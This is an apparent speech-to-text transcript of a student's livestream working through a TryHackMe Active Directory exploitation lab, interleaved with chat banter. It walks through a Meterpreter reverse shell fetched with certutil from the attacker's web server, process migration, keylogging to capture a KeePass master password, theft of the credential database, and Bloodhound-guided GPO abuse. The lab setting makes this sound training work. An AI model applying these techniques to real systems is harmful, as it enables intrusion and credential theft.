All right, how's everybody doing today? Yesterday, we did not do well. It was another debacle. And so today is the obligatory redemption stream where I try to right the wrongs of yesterday. It was so bad, in fact, we made so many mistakes that I doubled down on my education and my streaming and stuff, and after experimenting with a couple of different note-taking apps, I've settled on Joplin. And so you see I have the entire compromising Active Directory module, and each of the rooms and all the tasks laid out here with each task has a summary. The introduction summaries are pretty thin, and answers for the for the end of the each task. And these are pretty. I put some effort into this. Let's say I wouldn't go so far as to say a lot of effort, but everything here has a summary, and at the very least, summary and answers. And then some of the you can see this one has 6 notes. This was one of the more difficult tasks. So we have the summary, we have the apps that we're going to be looking at, and some information on those. This is where I keep the credentials I get, in addition to a file on the virtual machine. And then a lot of times I'll have questions that I'll pose to chat. So for example, if we can use THM jump to execute commands on THM IIS, why do we need a reverse shell from THM IIS? And chat has been pretty good. Oh, unknown, good luck. Thank you, I appreciate it. I'm gonna need it. This task was pretty difficult, but like I said, I'm doubling down. I'm redoubling my efforts, and so one of the things I'm going to populate on tonight's task notes is the troubleshooting section. So you can see for something like the task 3 on lateral movement spawning processes remotely, that gave me a lot of trouble too, and we encountered a lot of technical issues, and I did a bunch of troubleshooting, and I've listed those efforts here as part of the note-taking process. So we are today exploiting Active Directory, task 5, exploiting AD users, and I already have the answers, but we're going to go through it again, and hopefully this time it won't take us 4 hours. And I'm just going to review in real time some of the problems we encountered while doing this task. So one of the problems was, let's see, well, the biggest problem was I think some stream snipers reset the network while we were at the very tail end of the task, and so we had to start all over again. Trent, welcome back. Trent was instrumental in helping me finally find my way to getting the flags and everything. So I appreciate having him on. Trent, we did finally get the flags after 4 hours of effort, and I'm listing out some of the problems we encountered. So number 1, I'll number these later. There seemed to be some typos in the commands regarding quotes and single quotes. And so it's really important not to just cut and paste, but learn the commands and syntax. Part of the solution was, what was part of the solution? Was to eliminate the quotes entirely, it seemed like, anyways. Then always read ahead. Now we had done some reading ahead at one point. I'm gonna bring up the VPN or the VM and show you where we had problems. And actually I'm gonna restart this and start all over. So options, reset progress. Yes, reset my progress. So where was it? Here you can see there's a quote here, and then there's a single quote, which at the very least is wrong. If there should be any quotes at all, they should probably be uniform. But we eliminated them altogether. And then, so the first time around, we didn't encounter this problem. But it says, if you do not see an explorer.exe process for the trevor.local user, you can start the process yourself by performing the following steps. And when we finally realized that this might be part of the problem, I was running commands from the wrong computer. Always ahead. What's wrong with me? It is so hot here again. It is like I'm drowning. Always read ahead. Sometimes the solution is only a paragraph away. Like that meme where the guy's digging for diamonds and he gives up, and then the other guy digging for diamonds, he continues on to pay dirt. So sometimes just read ahead a little bit. I'm gonna have the robot read ahead. And then that brings us to the second point. Double check where you're supposed to be running commands from. Yeah, it is off here, and I don't have any air conditioning. I leave the window open so that the cat can get in and out, and so that kind of prohibits use of one of those not split heaters, but like the portable air conditioning. So, and no fan even, because of course I'm streaming. So and Trent was the one who picked up on my mistake with this one. And then what was the... Oh, and then later on in the night, I broke down and I read one of the hints to the flag challenges, and we had the wrong key database file. So when we ran the search, it only returned one key database file. So I think you can kind of forgive me for making the mistake of using the wrong one. Because again, I didn't think there were any others. The search only returned one. But anyways, I don't know if that's a good enough excuse, because obviously you should have the key database of the user that you've bugged for his keystrokes. Very embarrassing. So the entire thing was a bit of a debacle and quite embarrassing. But the good news is that it has convinced me that I need to double down on my education, and so that's what I'm doing. So some of these are broader tips and tricks to success, but specifically for this task, make sure you get the right key database. I don't know if I should leave this. I can hide this as like a spoiler alert, because if you're going to be reading the troubleshooting, you're going to come across hints that you might not want to read. Anyways, so that's where we're at. You can see I put in a lot of effort today creating this these notes, and I'm going to share them in some form or another on the website somehow. The idea is to get good enough at this that I'm able to confidently teach it. All right, with that being said, I think things should go far more swimmingly today. I hope I didn't ramble. I should start writing preambles for my live streams, because I'm kind of out of practice talking to human beings. and it shows during my live streams. So we don't really need this here. We're gonna relaunch all this stuff. Close tab. We're gonna close everything basically except for our creds, because that's it has our pass the hash commands here. All right. So here we go. I was hoping that Spook would join us today. He said that he was interested in seeing the whole thing start to finish, and hopefully this will be start to finish only 40 or so minutes rather than 4 hours. Oh my gosh. All right, I'm gonna start the robot off reading, and while she's reading I'm going to connect to the network.
We have gotten quite far with our exploitation up to this point. We have full administrative access to workstations and servers. Essentially, we can perform post-exploitation on almost any Tier 1 and Tier 2 system. But we still want to go further. This next task can also be seen as post-exploitation, but is often an excellent thing to use when we are still performing exploitation to reach a suitable position for goal execution. It is time for us to target AD users. Users and user behavior. The factory of the future will only have 2 employees. A human and a dog. The human will be there to feed the dog. The dog will be there to bite the human if they try to touch something.
Refresh the page in addition to
users are,
regenerating
unfortunately,
your VPN
often the weakest link in the security chain.
files.
Just think about weak passwords and bad habits, such as granting overly permissive permissions. It would be ignorant and ineffective to overlook this attack surface. While it is good to build up a proper enumeration and attack methodology against AD users, in this task, we will focus on 2 elements. Credential management, how users store their credentials. In AD, this is quite important since users may have multiple sets of credentials and remembering all of them can be a hassle. Keylogging often, during exploitation, we need to understand how normal users interact with a system. Together with screen grabs, keylogging can be a useful tool to gain this understanding from an attacker's perspective. Hunting for credentials. Now that we have compromised server 1, we should probably look around to see if there is any useful information. Have a look at the user directories and see if there is some useful information in any of them.
All right, let's pause that for a moment because that's going to bring up an important point. I'm going to go back to my notes and read the summary that ChatGPT helped me create. Credit where credit is due. All right, this looks good. Same IP as last time. So far so good. Let's see if we can get credentials. Not that we need them, but this is the most surefire way to see if DNS is configured and working properly. I mean, I know we've configured it properly, but let's see if it's working. And so far, it does not. Oh, you know what? Because this is a save state, I think I forgot to kill the previous OpenVPN connection. So let's see if that clears things up. Sudo kill all OpenVPN. And let's try the... Oh, I didn't even configure no... Okay. So in addition to killing the previous OpenVPN connection, we have to create a new one. And also be in the proper directory. Why are we not? Okay. We're getting there. Initialization sequence. I'm going to practice that in the mirror, saying initialization sequence. And no, we gotta reset. What? Oh, because I didn't see. Oh, God. All right, well, we can just overwrite that. Dimension it's hot. Just out of curiosity, do the other ones have? I can't really tell, but let's just make sure exploit AD is correctly configured. All right, so we have OpenVPN running and we have configured DNS. We should be able to get creds now, and we do get creds now. Fantastic. I think that's the fastest, most efficient time we've gotten connected to the network. All right. My mind's elsewhere. So they want us to poke around and find the credentials, and when we did that, we found the wrong, or not the credentials, they wanted us to poke around and find the key database file. And when we did that, it kind of got us all out of whack, and we got the wrong key database file. Because again, we want the key database file of the person whose keystrokes we're logging, and we don't know who that is yet. So again, I'm going to put some of this on tryhackme.com rather than me. All right, so let's see what our summary for this task is. The objective of this exercise is to target Active Directory users by exploiting user credential management practices and using keylogging to capture credentials, thus gaining further access and control over the system. Here are the steps. Number 1, gain remote code execution, and we're going to do that using a pass the hash attack. We're going to generate an interpreter payload using MSF Venom, create a listener in MSF console, host the payload on a Python web server, copy the payload to the target system, and obtain a interpreter shell. So we're opening a reverse shell. Then we're going to identify active user sessions. We're going to use the PA command in interpreter to list running processes and filter for Explorer. Not necessarily. If things go wrong, we might have to do that. 3, migrate interpreter to target user's process. Migrate the interpreter shelled process to the process of the active user. Crazy how many people are making videos about Active Directory on THN the past week or so. Are they? I haven't noticed. Who are some of your favorite YouTubers doing that? I would be interested in checking them out. Then 4, confirm context switch. 5, start keylogging. 6, capture and dump keystrokes. Hunt for credentials. Search the user directories for valuable information such as .kdbx files. And of course, again, we're not going to know who to target until we do these previous steps. Download the KDBX file using the interpreter download command. Open and analyze the credential database. Use keepass to, again, I think that's needlessly crude. I don't know why they would name that. To open the download KDBX file on your host system to analyze the stored credentials. I think it's keep your ass safe by using a key database system. Maybe that's where they get it from. I don't know. Optional, create a persistent foothold, and then by following these steps you can exploit user behavior and credential management to capture valuable information, gaining deeper access and control with the target system. So when I passed the text, the tryhackme text to ChatGPT, she and I were able to came up with this set of steps, and I think they're in a better order than what tryhackme presents. Because they are in part responsible for us coming up with the wrong KDBX file, which perplexed me to no end. Well, not to no end, but about an hour's worth of end. All right. Let's see where we're at. Let's have the robot continue reading.
Your enumeration efforts should lead you to a .kdbx file. A quick Google should confirm our suspicion that this file is indeed very valuable. We can use Meterpreter's download command to recover this file. This file seems to be a credential database. The issue, however, is that the database is encrypted with a password.
It's like a password
manager. We could
manager.
attempt to crack the password, but anyone who uses a credential database usually has the savvy to make sure the initial password is secure. We may have more success seeing how the user interacts with this database. System is sometimes too privileged. Meterpreter has a built-in keylogger. This will be useful for extracting the user's keystrokes. However, we can't just start this keylogger and hope for the best since our shell is currently running in the system context. System won't be typing any keystrokes, so this won't help us. To capture the correct user's credentials, we will need to ensure that our shell is running in the context of that user. Fortunately, Meterpreter provides us with a migrate feature, and since we are running as system, we should be able to migrate to any process. You have remote code execution on server 1. Use this to get a Meterpreter
this
shell.
Is starting to make
if you need a recap on using Meterpreter and Metasploit, here is a module on its use. However, for a quick rundown, you can use the following command to generate a PowerShell Meterpreter payload. msvenmp windows/x64/meterpreter/reverse_tcp lost equals exploitad port equals listening port fpsho shell.ps1.
Part of the problem is too that in other rooms, instead of putting in quotes, they put a $sign in front of the parameters that you're supposed to custom specify, and I think that way is better. It draws my attention more to the fact that it needs to be altered. You can then also use the following to create the associated listener in the ms console. sudo ms console qx use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lost exploitad set port listening port exploit. You can host your Meterpreter shell using a Python web server and then copy it using something like this. sertotal.exe earlcake split fhttp. So as long as we host our web server from the same folder on our attack box as shell.ps1, then we don't have to specify a full path here. I was wondering that the other day. And
////shell.ps1.
But this is
Once
not
you have a Meterpreter shell,
sufficient.
you can continue. The first step is to see if the users have any running processes on this machine. Note, if you do not see an explorer.exe process for the trevor.local user, you can start the process yourself by performing the following steps. Reset the password of the trevor.local user using the following command, net user trevor, local chosen password. Run the following in PowerShell, c:/auto-login.ps1 trevor, local chosen password server 1. Reboot the server using shutdown R. Once the server is back online, you should see the Explorer process. It seems like we are lucky.
Well, we're not lucky yet. I like using $sign and pound since it signifies what elevation the command requires. Oh, that's interesting. Yeah, I'm not aware with that denotation, but that's probably a good rule. I'm not there yet. I'm not able to really discern what elevation the command requires yet. I'm just starting out. But if I knew more, I would definitely use that notation. All right, so the first thing we want to do is get back on our THM server 1. And here's our pass the hash command. And I think we just... Nope, what is... Did I not do Control-Shift-C again? I did not. I'm a slow learner. Yeah, paste it. Alright, so now what do we want to do? We don't want to poke around and try to find the KDBX file yet. We want to generate the payload and get to work hosting. Let's rename this first. Hosting it on a server and downloading it on our target machine. Lots of rigmarole. All right, so let's see how many. Did we delete all the? No, some interpreter stuff. we're going to see like 5 different PowerShell scripts from last night. So is it just rm.ps1 ls? Good. And here we go, control. And we have to change the listening port. I just found out, I don't know why I didn't realize this earlier, but I've been using Alt-B to move back one word at a time, but of course you can use Control Arrow. So what did we do last time? Let's use 8444 for whatever reason. It seems like a nice random number. It's been lucky for us thus far. And yeah, what else do I want to do? I want to make sure our IP is the same as last night, which should be 10.50.81.151 if I remember correctly, and I do. And it is the same. Alright, we have our shell ready. My notes, sometimes I create like a cheat sheet of commands, but I don't know if I have them all. Let's see here. I don't have any. I think they're under a different folder though. And I have a, well, let's start the listener, shall we? Please be sure to raise the alarm if you see any typos. Eight, 444. Looks good. And it should do stuff. Do stuff, listener. Alright, good, it's listening. We're in our interpreter. Let's clear this directory as it is. So we'll want to, what, Python 3. This is slightly different from what I have in my cheat sheet. I'm going to use this one from here on out, because I've had such success with it lately. Alright, remember that port 8001. And now, what do we want to do here? We want to download it using a searchutil command, but not this searchutil command because it is insufficient. And I have my example here. The cheat sheet I created for this. Searchutil TACbox IP. Control arrow is better because it's the same in both environments. Alright, what was it? 10.50.81.151. Our port number was 8001. Whoa, not that many zeros. And the file name is, oddly enough, just shell with no number suffixed to it. Do I want to download it in this directory though? I don't know if I do. Let's copy this again. Temp is always a good choice, I think. Oh, why didn't it copy all the stuff I had inputted into it? This is going a lot quicker and more pleasantly than last time. Thus far, anyways. I don't want to jinx it. Is there a way to download or delete a word at a time? I think it's Alt backspace. Yes, Alt backspace. I'm learning. How's this look? This looks good to me. Wait, what? Oh man. So this has persisted since yesterday, huh? Let's try this again to make sure we're doing it right. Alright, I did not take... When it said a connection with the server could not be established, I didn't take it seriously. Sometimes I just proceed as if everything is working, irregardless of it's not, why didn't it work? URL cache, cert util URL cache split of HTTP out. What's wrong? Yeah, well, I want to get rid. You can see how difficult, what a debacle it was last night. We created multiple versions of the PowerShell. Oh, do I have to be in? No, I am in PowerShell, of the PowerShell script. But whatever. Worst comes to worst, we can just reset the server network. Which reminds me, alright, so nobody's going to be able to reset it while we're in the middle of key logging, so that's good. But this isn't good. No. Oh my god. You know, a million hours of muscle memory, I guess, is pretty difficult to get rid of. Oh, we didn't specify a name for it? Is that it? Is that all? No, that's not all. Well, okay, so in my head I'm misreading this. Yeah, I just, we started a HTTP server from the same folder that the script is in. So it should be open. But yeah, you know, I was rereading this. I always forget whether I'm coming or going. I thought it was telling me that there's some problem with my connection to THM server 1, but of course it's complaining about the HTTP server. How do I get the status of this? Why didn't it? I guess it wasn't open. I probably did something crazy like hit Control C. Alright, but whatever. It's working now. I'm not even going to question it. Yay! We did stuff. We did a thing. Alright, now we have to make that go. Command make shell.ps1 go. And what does Meterpreter say? It is giving us a prompt. We're moving right along. And indeed, let's expand this so we can compare it. Or maybe not. Well, let's just snap it around. We can compare it here. So here we have the PID path, the PID, the PPID, the name, session, user, and here we have one of these things looks very much like the other. The hacker. So is somebody else here on our machine as well? And we have Trevor Local, because the hacker was not here yesterday. Uh-oh, I hope we don't have another stream sniper. Alright, in any event, we don't have to go through this because things went well and we are lucky. I feel lucky. I'm lucky and grateful that everything has worked out so far. The user has an active session on THM server 1. Let's migrate to a process of this user. The safest bet is usually sometime like Explorer. What? Whatever. I'm just gonna put commands in, shall we? I just want to make sure I have the exact right ones here. So they're referencing the PID path. And I have to reference my PID path, which is 3792. Now we are ready to start our keylogger. Oh, I don't want human. I don't like when humans put robots out of a job. So let's have her catch up.
The user has an active session on server 1. Let's migrate to a process of this user.
Oh yeah, no, there is a. This is a shared network. Like this entire network is shared, and people can vote to reset it. So you get 1 vote per hour, and this was up to 4 of 5 votes when I started this process previously, and I took a short break, and when I came back the network had been reset. So there are other people on this server, and hopefully the hacker is not too malicious. All right, go ahead.
The safest bet is usually sometime like explorer.exe. We can confirm that we are now running in the context of our target using the getUid command. Now we are ready to start our keylogger. Now we have to be patient and wait. If we are...
Alright, so let's do that, and we'll be more or less patient and wait. We'll be only a little patient. We'll give it a couple of minutes. We'll listen to the hopefully copyright-free or more accurately, royalty-free synthwave. Yeah, I may have actually given people the idea of stream sniping in my previous streams when I more or less probably erroneously or erroneously blamed stream snipers for some of my network problems. Yeah. Hopefully they won't. Like I said, I wasn't too mad the other night when the network was restarted because it gave me a good excuse to do everything all over again and become more familiar with commands and learn things at a deeper level. So, you know, ideally there's honor among thieves, and pen testing professionals give each other, not that I'm a pen testing professional yet, but that they give each other, pen testing students give each other professional courtesy, or amateur courtesy in this case. So the analogy broke down there a little bit, but you get my idea. All right, I am confident we have captured all the keystrokes we need. Right, key, scan, dump. I'm really sure no one will guess my password. Alright. So we know that this is trevor.local. And this is where TryHackMe kind of gets it out of order, I think. They wanted us to go poking around and find anybody's files. But I think if they save that instruction for later, after we know exactly which users' files we should be poking around for, I think that would make the task go that much more swimmingly, yeah? Alright, so we got to get back on our server and cdc users. I'm just going to ignore all the warnings. I'm not even on the server anymore. All right, let's get back in. Too many arguments. Oh. Oh my God. It would, but that is a TOS violation to interfere with users or machines on rooms that aren't yours, so. Alright, CDC, I'm not even going to be brave and try to go deeper than into like users. We're just going to go right to C. Make sure there's a users folder. Alright, making progress here. And dir, and yeah, so this guy, he wasn't here yesterday, and I'm kind of embarrassed to admit it, but last night as I was panicking with stage fright trying to complete this task, I just glanced at this and I went into Trevor Jones's folder. Like, the creators of this room just pulled like a roadrunner on me, and I was, you know, Wile E. Coyote just. Anyways, this is the folder we want to be in. We're poking around to see if we can find anything valuable. And once you know it, we have to go into his documents folder. And not documents. That's a comment. I just wanted to show you all that common error that people do. So you don't feel embarrassed when you do it yourself. But you don't want the documents folder. You want the documents folder. There's an N in there. So I hope that was I hope that was helpful for everybody. All right, password database.kdbx, and we can use Meterpreter to download this. So one of the weird things about it is we have to use escape characters for the full path here. And I know I have this one on my cheat sheet. When I went through this yesterday, I made sure to write it down. Trent, are you still with us? Are you amazed at how well this is going this time around? Now that I've made every mistake possible. And hopefully I've learned from it. Alright, so here's nope, we're not in Meterpreter. Here's our command: download c // users // documents password.kdbx, and we're copying it into our exploit AD folder. All right, so run that. Downloading and skipped. Oh, because we already have it in there? Pretend we don't have it in there. Okay, so it's in there. Now, the one thing that I'm not going to do is uninstall KeePass2 and then reinstall it. But if you don't have it installed, KeePassX I wasn't really satisfied with its performance, but for some reason when you install KeePass2, you get like 140 different certs with it. So I'm a little skeptical about that. But just for argument's sake, this is what it looks like. Only it tells you you downloaded. Yeah, no, I tried that one too, but I wasn't really as I wasn't a fan of how it handled the database. This one's a little more graphical and a little more intuitive, I would think. So we're going to use KeePass2 and open it up. Failed to load module ATK bridge, but that's okay because here it is. And you can either use a master password or a key file. We of course have the password. KDBX, I'm really sure. Okay, and so this was also a clue. And that should work. And it did not, because I didn't do Control-Shift-C again, did I? Or I just do Control-V in this environment. All right. Whew, we're almost done. I don't know if I'm going to go on to exploiting GPOs. I don't normal KeePass doesn't work on mine since I use plugins to add custom encryption. Gotcha. Do you use KeePass as like your password manager? I'm looking to migrate from Kaspersky, and I'm thinking about using KeePass. How is it as a daily driver? What application is used to open the KDBX credential database? KeePass. What interpreter command do we use to move from system to user context? Migrate. Trying to use Bitwarden. Is that free and open source? What is the password of the credential database? I think I still have that in the clipboard. And this is... We've done so well today. I am going to give myself at least one.
Hack the planet!
Hack the planet. For getting the password. Yeah, yeah, Cloud Anything kind of weirds me out, but for the password managers, I really do need the synchronization feature. Plus, they get hacked all the time. Why is that? Like database breaches or Bitwarden? I'll look into it. All right, what is the flag? What is the value of the flag stored in the credential database? How long have we been going? Probably only about 45 minutes, right? 50 minutes, 51 minutes, 11 seconds. Oh, here's the flag. By the way, you can't copy this in, it won't work, watch. THM, 80 users can give up good secrets. Here we go. Vault Warden, locally hosted. Interesting. All right.
Hack the planet!
This task is super simple, so long as you make every possible mistake the first 2 times through, and you learn from each of those mistakes, and you take notes, and you create a cheat sheet for when to go through it again. Super simple. All right, great job, everyone. Cloudflare, Zero Trust Tunnel, plus Vault Warden would be pretty nice. Interesting, yeah. Blu-ray. Our local library is surprisingly well stocked on movies. And they have it in both versions too. Is the Blu-ray, I mean, does that add any resolution to it? Because I've never seen like an HD version. My DVD version looks very grainy, you know what I'm saying? And the clips I see on YouTube are also very grainy. So I don't know if they've like remastered it for use with Blu-ray. And then I saw YouTube more or less an expose on the AI upresing for Blu-ray, or for, you know, like the 4K offerings on Amazon streaming service. And the AI gets a lot of things wrong. It kind of pushes all the characters' faces into like an uncanny valley. So would you recommend like the Blu-ray over the DVD, or do they have like a commentator? Yeah, I think in this case, because it's such an old movie, I think the film grain is legit. But the DVD one looks kind of crusty. But if you recommend Blu-ray, I may be tempted to go out and get it. Alright, we had such good luck with today's tasks. I don't know if I want to push my luck and go further. I mean, I know it's only been an hour. But please vote in the comments. 1, take my winnings and run, or 2, push my luck. Because this next task, man, I need like a speech therapist or something at this point. This next task is also sight unseen, and we've seen kind of the pitfalls of doing that, trying to do these tasks without a net. So let me know what you think I should do. Should we call it quits and regroup tomorrow for task 6, or should we go for it? I'm in favor of taking my winnings and running, but let me know what you think we should do. 1 or 2, please leave it in chat. Hydrate and try another. Okay. Obscenity is for us. Can you tell I'm sweating through? 3, start some research on the next task. That would be part of the take the winnings and run. So, all right, I'll tell you what. Let's take a short break. Can you tell I'm sweating through? This is like soaked through. Anyways, very gross. Let's take a quick break. At the very least, I'm going to do a little reading and see how comfortable I feel with this. Trent was with us for the task 5 debacle, so he is of the same opinion as I am, that I should do my due diligence studying before I attempt anything, but we'll see. Alright, back in 10. And I'll make my decision then. So you might just be waiting around 10 minutes for nothing, but I think that's how it's gonna go. Alright, see you then. All right, I'm back. I'm refreshed, rehydrated. I have a cold Pepsi here, so I have access to caffeine. And I did read ahead, did a little bit of research on the next task. And it looks pretty easy, famous last words, but I think I'm gonna go for it. The worst thing that can happen is, well, I mean, a lot can go wrong. Let me just see here, hold on. What happened to our music in the meantime, by the way? Oh, I think when I swapped out the earbuds, it put it on pause. Anyways, where was I? I'm feeling confident. I think we can do this. Yeah, these are nice headsets, but they're pretty sensitive. Like if you tap them, they pause. If you double tap them, the volume goes up. So you can kind of manipulate the music that way, which is nice. All right. Looks like we're going to be exploiting group policy objects. Robot, take it away.
Keylogging the user allowed us to decrypt their credential database, providing us with credentials that can be useful to further our goal of AD exploitation, namely the SVC servman account. We need to perform a bit of enumeration to figure out what these credentials will be useful for. Luckily for us, we already have Sharphound data that we can use. Using the search feature in Bloodhound, let's review the permissions that the discovered account has. One permission, in particular, stands out for this account: ownership over a group policy object, GPO. Furthermore, when we do a bit of investigation, it seems like this GPO is applied to our Server 2 machine. This may provide us with the ideal opportunity to further our AD exploitation. Group policy objects. Remember when we
One moment, let me see if was the robot voice a little too loud? I don't think I properly edited the advanced audio properties before I started the stream.
the sysfil directory in enumerating AD? This is the directory where AD GPOs are stored to be replicated to domain-joined machines. A GPO is a virtual collection of policy settings. Each GPO has a unique name, called a GUID. That's why if you try to read the contents of the sysfil directory, it won't make a lot of sense with all the random names. Each Windows computer has a local policy configuration. This contains several notable configurations such as application configuration for services such as the firewall, antivirus, and app locker. Local group membership such as the administrator or remote desktop users groups. Startup configuration such as scripts that should be executed.
Ooh, that's interesting.
Security and protocol settings such as SMBv1 support. These are just a few examples. There are a significant amount of configuration options that can be set. Group policy management. If you only have one Windows computer, it is easy to change the local policy configuration directly on the host. However, you need a mechanism to deploy a configuration from a central location in large organizations. This is where Group Policy Management, GPM, comes into play. Instead of defining policies locally on each machine, GPM allows us to define policies directly on the AD structure. Essentially, we can define GPOs for AD objects, such as a specific OU or group. Domain-joined computers would then pull all policies from sysfil periodically and apply the relevant ones. By default, policies are replicated every 15 minutes through the pupdate application. We can, however, also manually execute this application from command prompt to apply policies instantly. Exploiting GPOs. Although there are several ways in which GPOs can be exploited, we will stick with the simple solution of adding an AD account we control to both the local administrators and local remote desktop users groups. This will allow us administrative privileges on server 2 and the ability to RDP in. We could also use the exposed SSH port, but not many organizations have upgraded to providing SSH access. Hence, RDP access or conventional lateral movement techniques like SMB-exec are safer. In order to modify the GPO, we need to access group policy management as the AD user that has the relevant permissions. We could RDP into server 1 as the user, but that may kick the user out of their active session, raising suspicion. Instead, we will RDP into THMWRK1 with either our normal or our Tier 2 admin account, inject the AD user's credentials into memory.
Our normal or our Tier 2 admin account. I don't remember getting a Tier 2 admin account, unless Trevor Local is Tier 2. No, Tier 2. Here's our Tier 2. Oh, the account we compromised. I only have the password that I set it as. But I think I remember the name. Oops. We compromised 2 Tier 2 accounts. One of which I think was Ross. Oh my god. T2 Ross Bird. Was Toby tier 2? And was it? Okay, I have Tony here again. Was it Toby Wilson? Let's go back a little bit. This is the one part of the task that kind of concerns me. Let's expand this for the time being. Toby. Is that a different room entirely? Anyways, I'm almost positive Ross Bird was one of the accounts we changed its password for. I'll take a look. I don't know if we have access to... Toby might have been a different room. Yeah, because we're already here up to task 5. I'm almost sure Ross Bird was one of them. Let's see if we can establish... Yeah. Let's see if we can establish an SSH session with Tier 2 Ross Bird. Yeah, Ross Bird. Which server did they want us to log into? THM work. Let's see. Oh, the network reset though, right? So I don't think this, yeah, this hasn't persisted. Let me try it one more time just in case. Alright, let's see if we can get in with a regular credentialed. Because it says our regular permissions, right? Instead, we will RDP into THM Work 1 with either our normal or our Tier 2 admin account. Inject the AD user's credential. Whose AD users? The one that we're logged in as? Why would we need to do that? I may have made the wrong decision here. I forgot that the network has been reset since I last obtained Tier 2 credentials. Inject the AD user's credentials into memory using the run as command and open MMC to modify the GPO. Let's see how far we get. Worst comes to worst, like even if it does turn out to be a debacle, YouTube offers editing features for the live streams where you can truncate them in either direction, so you can cut off part of the beginning and you can cut off part of the end. So we might just do that and have another redemption stream tomorrow night, you know, 1 step forward, 2 step back. Nope, that's not right. 2 steps forward. Let's do 2 steps forward and 1 step back at the very least. Alright, so supposedly these will work, and I'm not sure why we need to inject the credentials into memory if we already have the password, but I'm going to trust the process, as they say when you're a Bills fan. And, by the way, we should probably look at Bloodhound. And to do that, we have to be in our Bloodhound directory because it's 4.1.0 that we need, not the one that comes pre-installed with Kali. No, I think it's in this folder. This, yeah, CD. And then we do what? Bloodhound, no sandbox. Keylogging the user allowed us to decrypt their credential database, providing us with credentials that can be useful to further our goal of AD exploitation, namely the SVC serve man account. So how did you pronounce that? Serve man account? And did it? Because I was only interested in the flag. I wasn't really looking at what I should have been looking at in a real world scenario. Let's go back and look at it real quick, shall we? Watch this. On the 10th try today, I'm going to hit Control-Shift-C. And here, only Control-V. Look at that. Okay, so we did... I only have eyes for flag. So I guess we should probably copy this to our credentials page, huh? Why not? Why aren't we logging in as this guy then? And we want to check him out in Bloodhound and see what his deal is. Search for node. SVC SRO. It auto-suggested. Yes. Let's look at him. Done. And what are we supposed to be looking for here? We already have Sharphound data that we can use. Indeed. One permission stands out for this account. Ownership over a group policy object. Guess we just peruse the node info. Let's peruse the node info. Sibling objects in the same user. Oh, I did stuff. I didn't want to do that. Don't do pathfinding, just go back. There we go. Alright. Object ID, password, last change, last login. Password, extra properties, distinguished name, domain ID, password not required, false. Unconstrained delegation, we learned about that. I recognize that word. Local admin rights, nothing there. Derivative of local admin rights, not so much. Group delegated RDP privileges. Remote desktop, okay. Can RDP to THM work? SQL admin rights, none. First degree object control, is that what they mean? Is this a group policy object it has control over? Management server pushes, I think they mentioned that somewhere, right? Yeah, so that's part of this graph. Seems like this GPO is applied to our THM Server 2 machine. Manage servers in THM Server 2. How do I get there from here? Can I just add another node? Serviceman, management server pushes. What did that say? Stop. Management servers, and then, yeah. Okay, so that's how you get from there to there. See, I told you this task was going to be easy. This may provide us with the ideal opportunity to further our AD exploitation. Gosh, I hope so. Alright, so now we're down here. We could RDP into THM Server 1 as the user. Instead, we will RDP into THM work 1 with either our normal or tier 2 admin. I don't understand why. I understand that we may kick out the user of their active session on THM server 1, but why wouldn't they do that same thing on THM work 1? That's a question I'll put in my notes. Bear with me as I just do some stuff for my own edification. Remember, these are maximum effort streams, so I'm putting in the maximum effort I need to learn this stuff. Wouldn't we run the risk of logging out? Maybe they don't belong on THM server 1. Or THM work 1. Does that seem like a good question? I think it's a good question. There are no dumb questions. Hopefully, that's my only hope, that there are no dumb questions. Alright. For recap on the run as command, no, I will not refer to the enumerating AD room. That's in the past. We're moving forward. Alright, so we got our RDP. We can use this window. No, just be good. All right. RD. Okay. This command looks relevant. And who are we impersonating? Jack Hussein. Oops, I almost did that thing I do. Nope, not what I wanted. Was that the exact same? And what is our IP for THM work 1? I should remember this. Oh no, it's changed since last time, I think. Alright. 83, 248. Was that what I just had? Kind of. I have trust issues, so to a certain extent. Failed to initialize. You have correct Kerberos TGT initialized. Why would that be necessary? Is this something that we needed to have persist from previous tasks? It may be. The exploitation of constrained delegation, we now have privileged access to THM Server 1. Any thoughts? Yeah, it kind of feels like we need to have the TGT from this previous task. That's how I'm reading it. Me too, I've only been half paying attention myself, really. I don't mean to keep harping on how hot it is, but it is draining my life force. Obscenity, are you still there? Any thoughts? Anderson, thanks for joining. I am not familiar with that emoji. Have the vague inkling it's obscene, but it's not coming up in the search results. All right, let's see here. Let me look for, maybe it's just the, hopefully it's a failing of particular RDP I'm using. I think I've had some luck with xfreerdp. Oh, I should have used my alt backspace command that I just learned. Let's just copy and paste this. Yeah, so I don't know, I forgot to turn the fan off. Hopefully it's not too distracting. If it's not too distracting, the fan, then I'm gonna leave it on because it is the only thing keeping me sane. What's our guy Jack Hussein? Oh, I did the thing. Maybe that could be a drinking game. Every time I hit Control C, everybody could take a drink. Okay. Well, you can specify the domain. Interesting. Okay, so there was a Tony Wilson. He's not Toby, he's Tony. There's too many Tony/Tobys to keep track of. So that guy was Tony. Okay. We want work 1. U. Jack Hussein. And P. Control-Shift-C. I'm learning. Error connect DNS. Okay, let's go with the IP then. Alright, thankfully it wasn't a Kerberos TGT issue at all because I don't feel confident I could have I'm capable of solving that type of problem at this point yet. I mean, other than rerunning that one task. We're in. I need a clip to play whenever we're in. It was a weird something flashed there. All right. C, run as not only. Why are we injecting the credentials again? Let's have the robot eludicate. Is that a word? Did I make that up?
Using the run as command, and open MMC to modify the GPO. For a recap on the run as command, refer to the enumerating AD room. However, the required command is also provided here that should be executed from an administrative command prompt window. Once prompted, provide the password associated with the account. To verify that you provided the correct credentials, you can run dir/za.tryhackme.lock/sysvol. In the newly spawned command prompt window, we can start the Microsoft Management Console.
